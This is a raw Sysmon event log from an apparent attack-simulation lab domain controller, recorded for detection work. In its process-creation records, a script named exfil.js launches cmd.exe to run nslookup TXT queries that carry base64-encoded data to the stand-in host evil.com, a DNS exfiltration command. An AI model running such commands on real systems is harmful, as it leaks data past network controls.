14:16:12.664{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlftvp.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.617{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DB6E38C9F21581D572243537189BA55,SHA256=8E112517722327430280375F854028AF5CF61C48D87B4442B30300639B5914A3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.617{2E1864BB-17AC-629A-6A3E-000000005F02}12407868C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-6B3E-000000005F02}984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.596{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-6B3E-000000005F02}984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.596{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.596{2E1864BB-17AC-629A-693E-000000005F02}80326996C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-6B3E-000000005F02}984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.608{2E1864BB-17AC-629A-6B3E-000000005F02}984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-693E-000000005F02}8032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlftvp.tmp 2>&1 10341000x8000000000000000195771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.549{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-6A3E-000000005F02}1240C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.549{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-6A3E-000000005F02}1240C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.533{2E1864BB-17AC-629A-6A3E-000000005F02}12407868C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-693E-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.513{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-6A3E-000000005F02}1240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 22542200x8000000000000000195767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.934{00000000-0000-0000-0000-000000000000}3300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.807{00000000-0000-0000-0000-000000000000}732evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.719{00000000-0000-0000-0000-000000000000}5200evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.330{00000000-0000-0000-0000-000000000000}7616evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000195763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.200{00000000-0000-0000-0000-000000000000}5824evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000195762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.071{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52260- 354300x8000000000000000195761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.071{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52259- 354300x8000000000000000195760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.070{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52258- 354300x8000000000000000195759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:11.070{00000000-0000-0000-0000-000000000000}7764<unknown process>-udptruefalse127.0.0.1-52258-false127.0.0.1-53domain 22542200x8000000000000000195758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.070{00000000-0000-0000-0000-000000000000}5128evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000195757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.934{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52257- 354300x8000000000000000195756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.933{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52256- 354300x8000000000000000195755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.933{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52255- 354300x8000000000000000195754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:10.933{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-52255-false127.0.0.1-53domain 22542200x8000000000000000195753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.972{00000000-0000-0000-0000-000000000000}8028evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000195752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.495{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.495{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-693E-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.495{2E1864BB-17A1-629A-783D-000000005F02}55524624C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-693E-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.500{2E1864BB-17AC-629A-693E-000000005F02}8032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlftvp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.480{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlktbhzp.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.464{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7654E3A3794B2FBF3CE90D70165624,SHA256=1A45841E8901FE909D4557461CB534CD0204133DD0271D22713453C29EA12529,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-17AC-629A-673E-000000005F02}72127744C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-683E-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.417{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 